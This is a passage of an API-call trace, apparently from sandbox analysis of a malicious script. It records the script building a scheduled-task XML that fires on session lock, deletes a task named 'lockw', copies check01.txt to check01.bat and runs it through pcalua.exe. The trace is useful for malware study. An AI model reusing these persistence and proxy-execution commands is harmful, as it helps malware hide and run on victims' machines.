[0216.220] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="8", cbMultiByte=1, lpWideCharStr=0x369dc20, cchWideChar=1 | out: lpWideCharStr="8") returned 1
[0216.220] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=":", cbMultiByte=1, lpWideCharStr=0x369dc22, cchWideChar=1 | out: lpWideCharStr=":") returned 1
[0216.220] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="2", cbMultiByte=1, lpWideCharStr=0x369dc24, cchWideChar=1 | out: lpWideCharStr="2") returned 1
[0216.220] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="2", cbMultiByte=1, lpWideCharStr=0x369dc26, cchWideChar=1 | out: lpWideCharStr="2\槜∃) returned 1
[0216.220] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="<", cbMultiByte=1, lpWideCharStr=0x369dc28, cchWideChar=1 | out: lpWideCharStr="<ͩ") returned 1
[0216.220] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="/", cbMultiByte=1, lpWideCharStr=0x369dc2a, cchWideChar=1 | out: lpWideCharStr="/") returned 1
[0216.220] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="D", cbMultiByte=1, lpWideCharStr=0x369dc2c, cchWideChar=1 | out: lpWideCharStr="D") returned 1
[0216.220] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="a", cbMultiByte=1, lpWideCharStr=0x369dc2e, cchWideChar=1 | out: lpWideCharStr="a\槜∃) returned 1
[0216.220] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x369dc30, cchWideChar=1 | out: lpWideCharStr="tͩ") returned 1
[0216.220] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="e", cbMultiByte=1, lpWideCharStr=0x369dc32, cchWideChar=1 | out: lpWideCharStr="e") returned 1
[0216.220] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=">", cbMultiByte=1, lpWideCharStr=0x369dc34, cchWideChar=1 | out: lpWideCharStr=">") returned 1
[0216.220] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="\r", cbMultiByte=1, lpWideCharStr=0x369dc36, cchWideChar=1 | out: lpWideCharStr="\r") returned 1
[0216.220] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="\n", cbMultiByte=1, lpWideCharStr=0x369dc38, cchWideChar=1 | out: lpWideCharStr="\n") returned 1
[0216.221] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x369dc3a, cchWideChar=1 | out: lpWideCharStr=" ") returned 1
[0216.221] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x369dc3c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1
[0216.221] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x369dc3e, cchWideChar=1 | out: lpWideCharStr=" ") returned 1
[0216.221] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x369dc40, cchWideChar=1 | out: lpWideCharStr=" ") returned 1
[0216.221] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="<", cbMultiByte=1, lpWideCharStr=0x369dc42, cchWideChar=1 | out: lpWideCharStr="<") returned 1
[0216.221] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="U", cbMultiByte=1, lpWideCharStr=0x369dc44, cchWideChar=1 | out: lpWideCharStr="U") returned 1
[0216.221] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="R", cbMultiByte=1, lpWideCharStr=0x369dc46, cchWideChar=1 | out: lpWideCharStr="R\槜∃) returned 1
[0216.221] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="I", cbMultiByte=1, lpWideCharStr=0x369dc48, cchWideChar=1 | out: lpWideCharStr="Iͩ") returned 1
[0216.221] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=">", cbMultiByte=1, lpWideCharStr=0x369dc4a, cchWideChar=1 | out: lpWideCharStr=">") returned 1
[0216.221] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="\\", cbMultiByte=1, lpWideCharStr=0x369dc4c, cchWideChar=1 | out: lpWideCharStr="\\") returned 1
[0216.221] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Z", cbMultiByte=1, lpWideCharStr=0x369dc4e, cchWideChar=1 | out: lpWideCharStr="Z\槜∃) returned 1
[0216.221] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="1", cbMultiByte=1, lpWideCharStr=0x369dc50, cchWideChar=1 | out: lpWideCharStr="1ͩ") returned 1
[0216.221] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="1", cbMultiByte=1, lpWideCharStr=0x369dc52, cchWideChar=1 | out: lpWideCharStr="1") returned 1
[0216.221] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="<", cbMultiByte=1, lpWideCharStr=0x369dc54, cchWideChar=1 | out: lpWideCharStr="<") returned 1
[0216.222] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="/", cbMultiByte=1, lpWideCharStr=0x369dc56, cchWideChar=1 | out: lpWideCharStr="/") returned 1
[0216.222] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="U", cbMultiByte=1, lpWideCharStr=0x369dc58, cchWideChar=1 | out: lpWideCharStr="U") returned 1
[0216.222] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="R", cbMultiByte=1, lpWideCharStr=0x369dc5a, cchWideChar=1 | out: lpWideCharStr="R") returned 1
[0216.222] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="I", cbMultiByte=1, lpWideCharStr=0x369dc5c, cchWideChar=1 | out: lpWideCharStr="I") returned 1
[0216.222] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=">", cbMultiByte=1, lpWideCharStr=0x369dc5e, cchWideChar=1 | out: lpWideCharStr=">") returned 1
[0216.222] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="\r", cbMultiByte=1, lpWideCharStr=0x369dc60, cchWideChar=1 | out: lpWideCharStr="\r") returned 1
[0216.222] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="\n", cbMultiByte=1, lpWideCharStr=0x369dc62, cchWideChar=1 | out: lpWideCharStr="\n") returned 1
[0216.222] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x369dc64, cchWideChar=1 | out: lpWideCharStr=" ") returned 1
[0216.222] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x369dc66, cchWideChar=1 | out: lpWideCharStr=" ") returned 1
[0216.222] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="<", cbMultiByte=1, lpWideCharStr=0x369dc68, cchWideChar=1 | out: lpWideCharStr="<") returned 1
[0216.222] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="/", cbMultiByte=1, lpWideCharStr=0x369dc6a, cchWideChar=1 | out: lpWideCharStr="/") returned 1
[0216.222] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="R", cbMultiByte=1, lpWideCharStr=0x369dc6c, cchWideChar=1 | out: lpWideCharStr="R") returned 1
[0216.222] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="e", cbMultiByte=1, lpWideCharStr=0x369dc6e, cchWideChar=1 | out: lpWideCharStr="e") returned 1
[0216.223] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="g", cbMultiByte=1, lpWideCharStr=0x369dc70, cchWideChar=1 | out: lpWideCharStr="g") returned 1
[0216.223] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="i", cbMultiByte=1, lpWideCharStr=0x369dc72, cchWideChar=1 | out: lpWideCharStr="i") returned 1
[0216.223] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x369dc74, cchWideChar=1 | out: lpWideCharStr="s") returned 1
[0216.223] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x369dc76, cchWideChar=1 | out: lpWideCharStr="t") returned 1
[0216.223] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="r", cbMultiByte=1, lpWideCharStr=0x369dc78, cchWideChar=1 | out: lpWideCharStr="r") returned 1
[0216.223] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="a", cbMultiByte=1, lpWideCharStr=0x369dc7a, cchWideChar=1 | out: lpWideCharStr="a") returned 1
[0216.223] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x369dc7c, cchWideChar=1 | out: lpWideCharStr="t") returned 1
[0216.223] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="i", cbMultiByte=1, lpWideCharStr=0x369dc7e, cchWideChar=1 | out: lpWideCharStr="i") returned 1
[0216.223] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x369dc80, cchWideChar=1 | out: lpWideCharStr="o") returned 1
[0216.223] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0x369dc82, cchWideChar=1 | out: lpWideCharStr="n") returned 1
[0216.223] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="I", cbMultiByte=1, lpWideCharStr=0x369dc84, cchWideChar=1 | out: lpWideCharStr="I") returned 1
[0216.223] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0x369dc86, cchWideChar=1 | out: lpWideCharStr="n") returned 1
[0216.223] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="f", cbMultiByte=1, lpWideCharStr=0x369dc88, cchWideChar=1 | out: lpWideCharStr="f") returned 1
[0216.223] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x369dc8a, cchWideChar=1 | out: lpWideCharStr="o") returned 1
[0216.224] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=">", cbMultiByte=1, lpWideCharStr=0x369dc8c, cchWideChar=1 | out: lpWideCharStr=">") returned 1
[0216.224] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="\r", cbMultiByte=1, lpWideCharStr=0x369dc8e, cchWideChar=1 | out: lpWideCharStr="\r") returned 1
[0216.224] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="\n", cbMultiByte=1, lpWideCharStr=0x369dc90, cchWideChar=1 | out: lpWideCharStr="\n") returned 1
[0216.224] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x369dc92, cchWideChar=1 | out: lpWideCharStr=" ") returned 1
[0216.224] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x369dc94, cchWideChar=1 | out: lpWideCharStr=" ") returned 1
[0216.224] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="<", cbMultiByte=1, lpWideCharStr=0x369dc96, cchWideChar=1 | out: lpWideCharStr="<") returned 1
[0216.224] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="T", cbMultiByte=1, lpWideCharStr=0x369dc98, cchWideChar=1 | out: lpWideCharStr="T") returned 1
[0216.224] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="r", cbMultiByte=1, lpWideCharStr=0x369dc9a, cchWideChar=1 | out: lpWideCharStr="r") returned 1
[0216.224] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="i", cbMultiByte=1, lpWideCharStr=0x369dc9c, cchWideChar=1 | out: lpWideCharStr="i") returned 1
[0216.224] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="g", cbMultiByte=1, lpWideCharStr=0x369dc9e, cchWideChar=1 | out: lpWideCharStr="g") returned 1
[0216.224] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="g", cbMultiByte=1, lpWideCharStr=0x369dca0, cchWideChar=1 | out: lpWideCharStr="g") returned 1
[0216.224] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="e", cbMultiByte=1, lpWideCharStr=0x369dca2, cchWideChar=1 | out: lpWideCharStr="e") returned 1
[0216.224] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="r", cbMultiByte=1, lpWideCharStr=0x369dca4, cchWideChar=1 | out: lpWideCharStr="r") returned 1
[0216.224] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x369dca6, cchWideChar=1 | out: lpWideCharStr="s") returned 1
[0216.225] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=">", cbMultiByte=1, lpWideCharStr=0x369dca8, cchWideChar=1 | out: lpWideCharStr=">") returned 1
[0216.225] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="\r", cbMultiByte=1, lpWideCharStr=0x369dcaa, cchWideChar=1 | out: lpWideCharStr="\r") returned 1
[0216.225] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="\n", cbMultiByte=1, lpWideCharStr=0x369dcac, cchWideChar=1 | out: lpWideCharStr="\n") returned 1
[0216.225] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x369dcae, cchWideChar=1 | out: lpWideCharStr=" ") returned 1
[0216.225] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x369dcb0, cchWideChar=1 | out: lpWideCharStr=" ") returned 1
[0216.225] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x369dcb2, cchWideChar=1 | out: lpWideCharStr=" ") returned 1
[0216.225] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x369dcb4, cchWideChar=1 | out: lpWideCharStr=" ") returned 1
[0216.225] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="<", cbMultiByte=1, lpWideCharStr=0x369dcb6, cchWideChar=1 | out: lpWideCharStr="<") returned 1
[0216.225] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="S", cbMultiByte=1, lpWideCharStr=0x369dcb8, cchWideChar=1 | out: lpWideCharStr="S") returned 1
[0216.225] _read (in: _FileHandle=3, _DstBuf=0x107a2888, _MaxCharCount=0x200 | out: _DstBuf=0x107a2888*) returned 512
[0216.225] _read (in: _FileHandle=3, _DstBuf=0x107a2888, _MaxCharCount=0x200 | out: _DstBuf=0x107a2888*) returned 512
[0216.226] _read (in: _FileHandle=3, _DstBuf=0x107a2888, _MaxCharCount=0x200 | out: _DstBuf=0x107a2888*) returned 232
[0216.226] _close (_FileHandle=3) returned 0
[0216.226] CRetailMalloc_Free () returned 0x1
[0216.226] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERNAME", cchWideChar=9, lpMultiByteStr=0x15dba0, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="USERNAME", lpUsedDefaultChar=0x0) returned 9
[0216.226] getenv_s (in: _ReturnSize=0x15db08, _DstBuf=0x0, _DstSize=0x0, _VarName="USERNAME" | out: _ReturnSize=0x15db08, _DstBuf=0x0) returned 0x0
[0216.226] CRetailMalloc_Alloc () returned 0x12a99d40
[0216.226] getenv_s (in: _ReturnSize=0x15db08, _DstBuf=0x12a99d40, _DstSize=0xa, _VarName="USERNAME" | out: _ReturnSize=0x15db08, _DstBuf="kEecfMwgj") returned 0x0
[0216.227] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="kEecfMwgj", cbMultiByte=10, lpWideCharStr=0x11afe4c8, cchWideChar=20 | out: lpWideCharStr="kEecfMwgj") returned 10
[0216.227] SysReAllocStringLen (in: pbstr=0x15dad8*="kEecfMwgj", psz=0x0, len=0x9 | out: pbstr=0x15dad8*="kEecfMwgj") returned 1
[0216.227] CRetailMalloc_Free () returned 0x16ed205b80001
[0216.227] GetUserDefaultLCID () returned 0x409
[0216.227] LCMapStringW (in: Locale=0x409, dwMapFlags=0x100, lpSrcStr="\r\n\r\n \r\n 2024-01-02T21:08:22\r\n \\Z11\r\n \r\n \r\n \r\n true\r\n SessionLock\r\n xxx\r\n \r\n \r\n \r\n \r\nInteractiveToken \r\n \r\n \r\n \r\n IgnoreNew\r\n false\r\n true\r\n true\r\n false\r\n false\r\n \r\n false\r\n false\r\n \r\n true\r\n true\r\n true\r\n false\r\n false\r\n PT72H\r\n 7\r\n \r\n \r\n \r\n schtasks.exe\r\n /delete /tn \"\\lockw\" /f\r\n \r\n \r\n cmd.exe\r\n /c \"copy /y \"%temp%\\check01.txt\" \"%temp%\\check01.bat\" & timeout 1\"\r\n \r\n \r\n pcalua.exe\r\n -a \"%temp%\\check01.bat\"\r\n \r\n \r\n", cchSrc=1768, lpDestStr=0x517bd58, cchDest=1768 | out: lpDestStr="\r\n\r\n \r\n 2024-01-02t21:08:22\r\n \\z11\r\n \r\n \r\n \r\n true\r\n sessionlock\r\n xxx\r\n \r\n \r\n \r\n \r\ninteractivetoken \r\n \r\n \r\n \r\n ignorenew\r\n false\r\n true\r\n true\r\n false\r\n false\r\n \r\n false\r\n false\r\n \r\n true\r\n true\r\n true\r\n false\r\n false\r\n pt72h\r\n 7\r\n \r\n \r\n \r\n schtasks.exe\r\n /delete /tn \"\\lockw\" /f\r\n \r\n \r\n cmd.exe\r\n /c \"copy /y \"%temp%\\check01.txt\" \"%temp%\\check01.bat\" & timeout 1\"\r\n \r\n \r\n pcalua.exe\r\n -a \"%temp%\\check01.bat\"\r\n \r\n \r\n") returned 1768
[0216.230] LCMapStringW (in: Locale=0x409, dwMapFlags=0x100, lpSrcStr="xxx", cchSrc=3, lpDestStr=0x6f12298, cchDest=3 | out: lpDestStr="xxx") returned 3
[0216.230] free (_Block=0x0)
[0216.230] malloc (_Size=0xa0) returned 0x888e2c0
[0216.234] free (_Block=0x888e2c0)
[0216.235] memcpy (in: _Dst=0x177de428, _Src=0x50bc5f8, _Size=0x2de | out: _Dst=0x177de428) returned 0x177de428
[0216.235] memcpy (in: _Dst=0x177de706, _Src=0x6f12298, _Size=0x12 | out: _Dst=0x177de706) returned 0x177de706
[0216.235] memcpy (in: _Dst=0x177de718, _Src=0x70d6d88, _Size=0xb8 | out: _Dst=0x177de718) returned 0x177de718
[0216.235] memcpy (in: _Dst=0x177de7d0, _Src=0x6f12298, _Size=0x12 | out: _Dst=0x177de7d0) returned 0x177de7d0
[0216.235] memcpy (in: _Dst=0x177de7e2, _Src=0x1795c778, _Size=0x6e2 | out: _Dst=0x177de7e2) returned 0x177de7e2
[0216.235] memcpy (in: _Dst=0x177deec4, _Src=0x6f12298, _Size=0x12 | out: _Dst=0x177deec4) returned 0x177deec4
[0216.235] memcpy (in: _Dst=0x177deed6, _Src=0x12e886a8, _Size=0x346 | out: _Dst=0x177deed6) returned 0x177deed6
[0216.236] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="temp", cchWideChar=5, lpMultiByteStr=0x15dba0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="temp", lpUsedDefaultChar=0x0) returned 5
[0216.236] getenv_s (in: _ReturnSize=0x15db08, _DstBuf=0x0, _DstSize=0x0, _VarName="temp" | out: _ReturnSize=0x15db08, _DstBuf=0x0) returned 0x0
[0216.236] CRetailMalloc_Alloc () returned 0x6f14600
[0216.236] getenv_s (in: _ReturnSize=0x15db08, _DstBuf=0x6f14600, _DstSize=0x25, _VarName="temp" | out: _ReturnSize=0x15db08, _DstBuf="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp") returned 0x0
[0216.237] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp", cbMultiByte=37, lpWideCharStr=0x70d6d88, cchWideChar=74 | out: lpWideCharStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp") returned 37
[0216.237] SysReAllocStringLen (in: pbstr=0x15dad8*="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp", psz=0x0, len=0x24 | out: pbstr=0x15dad8*="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp") returned 1
[0216.237] CRetailMalloc_Free () returned 0x1
[0216.237] VarAdd (in: pvarLeft=0x1086ee78, pvarRight=0x1086ef58, pvarResult=0x1086ee60 | out: pvarResult=0x1086ee60) returned 0x0
[0216.237] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\Z11.xml", cchWideChar=-1, lpMultiByteStr=0x15da40, cbMultiByte=261, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\Z11.xml", lpUsedDefaultChar=0x0) returned 45
[0216.237] _fullpath (in: _FullPath=0x15dbd0, _Path="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\Z11.xml", _SizeInBytes=0x104 | out: _FullPath="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\Z11.xml") returned="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\Z11.xml"
[0216.237] _sopen_s (in: _FileHandle=0x15db80, _FileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\Z11.xml" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\z11.xml"), _OpenFlag=33537, _ShareFlag=64, _PermissionMode=384 | out: _FileHandle=0x15db80*=3) returned 0x0
[0216.239] CRetailMalloc_Alloc () returned 0x36edb30
[0216.240] strcpy_s (in: _Dst=0x36edd68, _DstSize=0x2d, _Src="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\Z11.xml" | out: _Dst="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\Z11.xml") returned 0x0
[0216.241] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\r\n\r\n \r\n 2024-01-02T21:08:22\r\n \\Z11\r\n \r\n \r\n \r\n true\r\n SessionLock\r\n kEecfMwgj\r\n \r\n \r\n \r\n \r\nInteractiveToken \r\n \r\n \r\n \r\n IgnoreNew\r\n false\r\n true\r\n true\r\n false\r\n false\r\n \r\n false\r\n false\r\n \r\n true\r\n true\r\n true\r\n false\r\n false\r\n PT72H\r\n 7\r\n \r\n \r\n \r\n schtasks.exe\r\n /delete /tn \"\\lockw\" /f\r\n \r\n \r\n cmd.exe\r\n /c \"copy /y \"%temp%\\check01.txt\" \"%temp%\\check01.bat\" & timeout 1\"\r\n \r\n \r\n pcalua.exe\r\n -a \"%temp%\\check01.bat\"\r\n \r\n \r\n", cchWideChar=1786, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1786
[0216.241] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\r\n\r\n \r\n 2024-01-02T21:08:22\r\n \\Z11\r\n \r\n \r\n \r\n true\r\n SessionLock\r\n kEecfMwgj\r\n \r\n \r\n \r\n \r\nInteractiveToken \r\n \r\n \r\n \r\n IgnoreNew\r\n false\r\n true\r\n true\r\n false\r\n false\r\n \r\n false\r\n false\r\n \r\n true\r\n true\r\n true\r\n false\r\n false\r\n PT72H\r\n 7\r\n \r\n \r\n \r\n schtasks.exe\r\n /delete /tn \"\\lockw\" /f\r\n \r\n \r\n cmd.exe\r\n /c \"copy /y \"%temp%\\check01.txt\" \"%temp%\\check01.bat\" & timeout 1\"\r\n \r\n \r\n pcalua.exe\r\n -a \"%temp%\\check01.bat\"\r\n \r\n \r\n", cchWideChar=1786, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1786
[0216.241] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\r\n\r\n \r\n 2024-01-02T21:08:22\r\n \\Z11\r\n \r\n \r\n \r\n true\r\n SessionLock\r\n kEecfMwgj\r\n \r\n \r\n \r\n \r\nInteractiveToken \r\n \r\n \r\n \r\n IgnoreNew\r\n false\r\n true\r\n true\r\n false\r\n false\r\n \r\n false\r\n false\r\n \r\n true\r\n true\r\n true\r\n false\r\n false\r\n PT72H\r\n 7\r\n \r\n \r\n \r\n schtasks.exe\r\n /delete /tn \"\\lockw\" /f\r\n \r\n \r\n cmd.exe\r\n /c \"copy /y \"%temp%\\check01.txt\" \"%temp%\\check01.bat\" & timeout 1\"\r\n \r\n \r\n pcalua.exe\r\n -a \"%temp%\\check01.bat\"\r\n \r\n \r\n", cchWideChar=1786, lpMultiByteStr=0x12e87538, cbMultiByte=1786, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n\r\n \r\n 2024-01-02T21:08:22\r\n \\Z11\r\n \r\n \r\n \r\n true\r\n SessionLock\r\n kEecfMwgj\r\n \r\n \r\n \r\n \r\nInteractiveToken \r\n \r\n \r\n \r\n IgnoreNew\r\n false\r\n true\r\n true\r\n false\r\n false\r\n \r\n false\r\n false\r\n \r\n true\r\n true\r\n true\r\n false\r\n false\r\n PT72H\r\n 7\r\n \r\n \r\n \r\n schtasks.exe\r\n /delete /tn \"\\lockw\" /f\r\n \r\n \r\n cmd.exe\r\n /c \"copy /y \"%temp%\\check01.txt\" \"%temp%\\check01.bat\" & timeout 1\"\r\n \r\n \r\n pcalua.exe\r\n -a \"%temp%\\check01.bat\"\r\n \r\n \r\n", lpUsedDefaultChar=0x0) returned 1786
[0216.258] memcpy (in: _Dst=0x36edb68, _Src=0x12e87538, _Size=0x200 | out: _Dst=0x36edb68) returned 0x36edb68
[0216.258] _write (in: _FileHandle=3, _Buf=0x36edb68*, _MaxCharCount=0x200 | out: _Buf=0x36edb68*) returned 512
[0216.261] _write (in: _FileHandle=3, _Buf=0x12e87738*, _MaxCharCount=0x4fa | out: _Buf=0x12e87738*) returned 1274
[0216.261] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 2
[0216.262] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x10ad0b88, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n", lpUsedDefaultChar=0x0) returned 2
[0216.262] memcpy (in: _Dst=0x36edb68, _Src=0x10ad0b88, _Size=0x2 | out: _Dst=0x36edb68) returned 0x36edb68
[0216.262] _write (in: _FileHandle=3, _Buf=0x36edb68*, _MaxCharCount=0x2 | out: _Buf=0x36edb68*) returned 2
[0216.262] _close (_FileHandle=3) returned 0
[0216.263] CRetailMalloc_Free () returned 0x1e00ec0001
[0216.264] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windir", cchWideChar=7, lpMultiByteStr=0x15dba0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="windir", lpUsedDefaultChar=0x0) returned 7
[0216.264] getenv_s (in: _ReturnSize=0x15db08, _DstBuf=0x0, _DstSize=0x0, _VarName="windir" | out: _ReturnSize=0x15db08, _DstBuf=0x0) returned 0x0
[0216.264] CRetailMalloc_Alloc () returned 0x12a99d40
